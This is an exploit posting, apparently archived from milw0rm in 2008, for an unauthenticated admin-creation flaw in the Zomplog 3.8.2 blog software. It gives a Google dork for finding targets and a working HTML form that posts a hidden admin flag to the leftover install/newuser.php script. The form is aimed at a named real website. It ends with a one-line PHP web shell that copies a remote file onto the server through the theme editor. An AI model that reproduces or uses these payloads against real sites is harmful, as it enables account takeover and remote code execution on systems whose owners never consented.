49 lines
No EOL
1.7 KiB
HTML
49 lines
No EOL
1.7 KiB
HTML
======================== WEBXAKEP.NET ===========================
|
|
|
|
Name: "Zomplog 3.8.2 <= add admin"
|
|
Version: All
|
|
Script Download: http://www.zomp.nl/zomplog/
|
|
DORK: "powered by zomplog"
|
|
Discovered By: ArxWolf
|
|
Discovered On: 16 05 2008
|
|
WWW: http://WebXakep.net
|
|
ICQ: 504-282
|
|
|
|
Vulnerability to "install/newuser.php", to add 2 administrator.
|
|
Folder "install" not removed in 70% of cases.
|
|
|
|
Exploit:
|
|
--------------------------------------------------------
|
|
<br><b><center>ДобавлÑем админа "Add Admin"</center></b><br><br>
|
|
<!-- <form action="http://localhost/install/newuser.php" method="POST"> /-->
|
|
<form action="http://weblog.sgrim.us/install/newuser.php" method="POST">
|
|
<p>Титлы блога "Blog Title"<br />
|
|
<input type="text" name="weblog_title" maxlength="40" id="blogname" />
|
|
<br />
|
|
<br />
|
|
Логин "Username"<br />
|
|
<input type="text" name="login" maxlength="15" id="name" />
|
|
<br />
|
|
<br />
|
|
Пароль "Password"<br />
|
|
<input type="password" name="password" maxlength="15" id="pwd" />
|
|
<br />
|
|
<br />
|
|
ПовторÑем пароль "Confirm password"<br />
|
|
<input type="password" name="password2" maxlength="15" id="pwd2" />
|
|
<br />
|
|
<br />
|
|
<input name="admin" type="hidden" id="admin" value="1" />
|
|
<input name="submit_user" type="submit" value="Submit ››" id="submit" />
|
|
|
|
</p>
|
|
</form>
|
|
-------------------------------------------------------------
|
|
|
|
http://******/admin/profile.php // Add or delete user ^_^
|
|
http://******/admin/themes.php // If there is a right of entry you can fill shell. <?php copy($_GET['i'],$_GET['o']); ?>
|
|
|
|
|
|
========================= WEBXAKEP.NET ===========================
|
|
|
|
# milw0rm.com [2008-05-16] |